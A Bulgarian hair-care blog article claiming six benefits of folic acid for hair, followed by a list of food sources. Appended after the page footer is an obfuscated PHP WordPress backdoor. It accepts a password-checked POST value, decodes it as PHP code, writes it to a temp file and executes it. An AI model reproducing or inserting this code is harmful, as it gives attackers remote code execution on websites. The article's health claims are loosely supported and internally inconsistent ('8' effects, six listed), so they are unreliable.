6 ползи от фолиевата киселина за косата ви | Косопад

6 ползи от фолиевата киселина за косата ви

kosa-polezno

Фолиевата киселина, известна още като витамин В9, е много полезна за всеки един орган в тялото ни.

Това е водноразтворим витамин, който участва в образуването на червени кръвни телца и в работата на централната нервна система.

Дефицитът на фолиева киселина може да причини различни здравословни проблеми, включително анормален косопад и изсъхване на косата. Може да забави растежа на косъма и да ускори остаряването.

Много проблеми, свързани с косата, се дължат на недостатъчно количество фолиева киселина в тялото ни. Ето 8 от най- важните въздействия:

1 Подсилва косата

Редовният прием на фолиева киселина помага за клетъчното възстановяване, подсилва корените на косата и я предпазва от отслабване.

Често изсъхването и късането на косата могат да се преодолеят чрез консумация на храни, богати на фолиева киселина. В комбинация с вещества като витамин С, магнезий и биотин, създават предпазен слой от външните агенти.

kosa-keratin

2 Помага за растежа

Ако косата ви трудно расте, може да й липсват витамини от В- комплекс, включително фолиева киселина.

Витамин В9 стимулира космените фоликули, помага за клетъчното възстановяване и ускорява действието на полезните вещества. Има основна роля в образуването на червени кръвни телца, които пренасят кислорода в скалпа.

3 Предпазва от анемия

Фолиевата киселина предпазва от развиването на анемия. Това състояние се характеризира с намаляване на хемоглобина и дефицит на желязо, предизвиква отслабване на косата, ноктите.

4 Участва в усвояването на хранителните вещества

Помага за ефикасното усвояване на протеини, мазнини и въглехидрати. Участва в усвояването на различни хранителни вещества, полезни за здравето.

Редовният прием на фолиева киселина помага срещу алопеция, проблеми със скалпа и хирзутизъм.

5 Дава повече блясък

Мека, обемна и блестяща коса изисква достатъчно количество В9. Той ускорява деленето на клетките, помага на скалпа да усвоява повече вещества и подобрява естетически свойства на косата.

6 Предпазва от ранно побеляване

Ако започнете да побелявате рано, преди да навършите 40, може да се дължи на дефицит на фолиева киселина.

ПРИРОДНИ ИЗТОЧНИТИ НА ФОЛИЕВА КИСЕЛИНА

  • Зеленолистни зеленчуци
  • Бобови култури
  • Аспержи
  • Авокадо
  • Цитрусови плодове

17. март 2016 10:43:53 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}